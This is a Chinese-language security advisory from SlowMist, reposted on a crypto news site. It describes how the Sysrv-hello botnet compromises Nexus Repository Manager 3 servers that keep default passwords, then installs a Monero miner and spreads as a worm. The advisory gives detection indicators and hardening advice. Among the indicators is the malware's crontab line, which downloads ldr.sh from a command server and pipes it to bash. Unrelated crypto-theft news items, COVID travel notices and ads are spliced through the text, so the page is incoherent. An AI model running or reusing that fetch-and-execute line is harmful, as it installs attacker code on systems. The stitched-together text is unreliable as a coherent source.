攻击路径
Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击,Maven私服部署会用到NexusRepositoryManager3,由于Maven是个流行服务,所以也给了Sysrv-hello僵尸网络的大范围感染机会。
当NexusRepositoryManager3服务对外网开放且存在默认账号密码时,Sysrv-hello就可以直接扫描入侵,利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。
慢雾:7月3日至7月7日期间?Web3生态因安全问题损失近1.3亿美元:7月10日消息,慢雾发推称,自7月3日至7月7日,Web3生态因安全问题遭遇攻击损失128,419,000美元,包括Encryption AI、AzukiDao、NFT Trader、MIKE&SID、Bryan Pellegrino、Aptos Foundation、Multichain、CivFund。其中,Multichain被攻击损失1.26亿美元。[2023/7/10 10:12:36]
入侵到服务器后会自动下载执行ldr.sh文件,该文件主要功能:1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿,文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴
慢雾:BXH于BSC链被盗的ETH、BTC类资产已全部跨链转至相应链:11月3日消息,10月30日攻击BXH的黑客(BSC: 0x48c94305bddfd80c6f4076963866d968cac27d79)在洗币过程中,多次使用了 AnySwap、PancakeSwap、Ellipsis 等兑换平台,其中部分 ETH 代币被兑换成 BTC。此外,黑客现已将 13304.6 ETH、642.88 BTCB 代币从 BSC 链转移到 ETH、BTC 链,目前,初始黑客获利地址仍有 15546 BNB 和价值超 3376 万美元的代币。慢雾 AML 将持续监控被盗资金的转移,拉黑攻击者控制的所有钱包地址,提醒交易所、钱包注意加强地址监控,避免相关恶意资金流入平台。[2021/11/3 6:28:49]
第二个木马sysrv的主要功能:1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播,随机扫描其他IP服务,同样进行NexusRepositoryManager3漏洞利用,同时也会尝试入侵MySQL、Tomcat、WebLogic等服务
声音 | 慢雾:使用中心化数字货币交易所及钱包的用户注意撞库攻击:据慢雾消息,近日,注意到撞库攻击导致用户数字货币被盗的情况,具体原因在于用户重复使用了已泄露的密码或密码通过撞库攻击的“密码生成基本算法”可以被轻易猜测,同时用户在这些中心化服务里并未开启双因素认证。分析认为,被盗用户之所以没开启双因素认证是以为设置了独立的资金密码就很安全,但实际上依赖密码的认证体系本身就不是个足够靠谱的安全体系,且各大中心化数字货币交易所及钱包在用户账号风控体系的策略不一定都一致,这种不一致可能导致用户由于“惯性思维”而出现安全问题。[2019/3/10]
自查方法
进程:network01sysrv
文件:/tmp/network01/tmp/sysrv/tmp/flag.txt
crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-
端口:52013
存在以上这些,停止备份样本后删除。
加固建议
删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问,严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后,重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力,存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。
本文来源于非小号媒体平台:
慢雾科技
现已在非小号资讯平台发布68篇作品,
非小号开放平台欢迎币圈作者入驻
入驻指南:
/apply_guide/
本文网址:
/news/9606255.html
免责声明:
1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险
2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场
上一篇:
深入解析MakeDao在新周期里的机遇和风险
出行无需核酸证明,尽量减少前往境内疫情级别中高风险地区所在省市出行活动,如确有特殊原因前往中高风险地区的人员,要在出行前向所在社区(村委会)登记、向所在单位报备,返回后第一时间主动报告.
HomiEx已完成"PEARL交易送积分轮盘转不停"所有奖励已全部分发,请在“钱包-资产记录”查看分发结果.
10分钟学懂DeFi借贷——揭开DeFiLending神秘的面纱 一、什么是借贷 Lending中文就是借贷,想要了解借贷,我们可以先从生活中说起,生活中,经常会发生借行为.
01 加密数字货币市场 1、政策及市场指标 由贪婪指数下降到40恐慌指数,这个幅度刷新了认知。今天爆仓了将近10亿美金,连续三天的释放,空头基本已经衰竭,接下来是多头反攻行情.
1.倡导广大市民非必要不出行,如确需外出,要注意查询目的地的疫情风险等级,全程做好个人防护,遵守当地的疫情防控要求.
原则上不到境外及国内中高风险地区旅游出行,如确需前行,须向单位报备,返回后落实集中隔离医学观察和核酸检测,非必要不离梧离桂.